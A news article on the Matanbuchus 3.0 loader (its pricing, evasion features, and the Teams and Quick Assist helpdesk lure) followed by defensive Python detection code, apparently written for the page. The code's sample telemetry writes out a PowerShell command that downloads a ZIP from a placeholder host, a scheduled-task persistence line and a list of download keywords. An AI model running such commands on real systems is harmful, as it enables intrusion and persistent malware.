Matanbuchus 3.0 loader enables stealth ransomware attacks using Quick Assist and Teams lures
A newly upgraded malware loader known as Matanbuchus 3.0 is enabling cybercriminals to conduct highly targeted ransomware attacks, employing advanced evasion techniques that challenge even well-defended networks.
First introduced in 2021 and now in its third major version, the malware-as-a-service platform has been fully rewritten based on operator feedback. The new release includes detection logic for endpoint protection platforms from vendors such as Microsoft, CrowdStrike, SentinelOne, Sophos, Trellix, Cortex, Bitdefender, ESET and Symantec. It also offers DNS-based command-and-control communications for greater stealth.
Originally advertised on Russian-language forums at US$2,500 per rental, the loader now commands monthly fees of US$10,000 for the HTTPS variant and US$15,000 for the DNS version—positioning it for high-value threat actors.
According to researchers at Morphisec, a campaign launched in September 2024 used Microsoft Teams to impersonate IT helpdesks. Attackers encouraged employees to activate Quick Assist, Microsoft’s built-in remote support tool. Once access was granted, users were guided to run PowerShell scripts that retrieved ZIP files from external servers.
The ZIP archives contained renamed Notepad++ updaters, modified configuration files pointing to typosquatted domains, and malicious DLLs that side-loaded the Matanbuchus loader. Secondary payloads included well-known ransomware precursors such as Cobalt Strike, QakBot and DanaBot.
Key capabilities of Matanbuchus 3.0 include in-memory execution, dynamic obfuscation using MurmurHash3, Heaven’s Gate-style syscall evasion, WMI Query Language reconnaissance, and PowerShell-based reverse shells. Command-and-control traffic is masked as legitimate Skype activity, while persistence is achieved through scheduled tasks and COM-based shellcode injection. The malware also scans host systems for installed applications, services and security tools to adapt its behaviour mid-operation.
Security researchers note that these techniques align with tactics observed in campaigns attributed to ransomware groups such as Black Basta. The loader was seen in use weeks before its public promotion on July 7, 2025, suggesting early distribution among sophisticated actors.
This evolution underscores a growing market for subscription-based cybercrime infrastructure. Experts recommend strengthening protections around chat-based platforms, validating remote access requests, and monitoring script executions and endpoint behaviours for signs of “living off the land” attacks.
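As an added illustration of the script-execution and remote-access monitoring recommended above (example code written for this page, not from the article, Morphisec or the malware authors), the following Python flags the Quick Assist to PowerShell download chain and the scheduled-task persistence described earlier when run over constructed process-creation events; the event schema, the process name quickassist.exe and the download/persistence keywords are assumptions rather than anything stated in the article.

```python
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """One process-creation record (assumed schema, not a real EDR format)."""
    pid: int
    ppid: int
    image: str      # executable name, lower-case
    cmdline: str

# Constructed sample telemetry: a remote-support session where the "helpdesk"
# walks the user into running a PowerShell downloader, then sets persistence.
SAMPLE_EVENTS = [
    ProcEvent(100, 1,   "explorer.exe",   "explorer.exe"),
    ProcEvent(200, 100, "quickassist.exe", "QuickAssist.exe"),          # assumed image name
    ProcEvent(300, 200, "cmd.exe",        "cmd.exe /c powershell ..."),
    ProcEvent(400, 300, "powershell.exe",
              "powershell -ep bypass -c \"iwr http://example.invalid/update.zip "
              "-OutFile $env:TEMP\\update.zip\""),                      # placeholder URL
    ProcEvent(500, 100, "powershell.exe", "powershell Get-Date"),      # benign, no remote parent
    ProcEvent(600, 400, "schtasks.exe",
              "schtasks /create /tn Updater /tr C:\\Users\\u\\AppData\\Local\\Temp\\upd.exe"),
]

REMOTE_ASSIST = {"quickassist.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
DOWNLOAD_TOKENS = ("invoke-webrequest", "iwr ", "downloadstring", "downloadfile",
                   "start-bitstransfer", "curl ")

def ancestors(ev, by_pid, max_depth=8):
    """Walk the parent chain (bounded, since pid reuse can create loops)."""
    chain, cur = [], by_pid.get(ev.ppid)
    while cur is not None and len(chain) < max_depth:
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    return chain

def detect(events):
    """Return (rule_name, pid) alerts for the two behaviours in the reported chain."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        chain = ancestors(e, by_pid)
        cmd = e.cmdline.lower()
        # Rule 1: a script host that downloads content while a remote-assist tool is an ancestor.
        if e.image in SCRIPT_HOSTS and any(a.image in REMOTE_ASSIST for a in chain) \
                and any(tok in cmd for tok in DOWNLOAD_TOKENS):
            alerts.append(("script_download_in_remote_session", e.pid))
        # Rule 2: scheduled-task creation launched from a script host (assumed persistence path).
        if e.image == "schtasks.exe" and "/create" in cmd \
                and any(a.image in SCRIPT_HOSTS for a in chain):
            alerts.append(("scheduled_task_from_script", e.pid))
    return alerts
```

In production the same logic would key on ancestry rather than names alone, since the article notes the updater binaries themselves are renamed.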
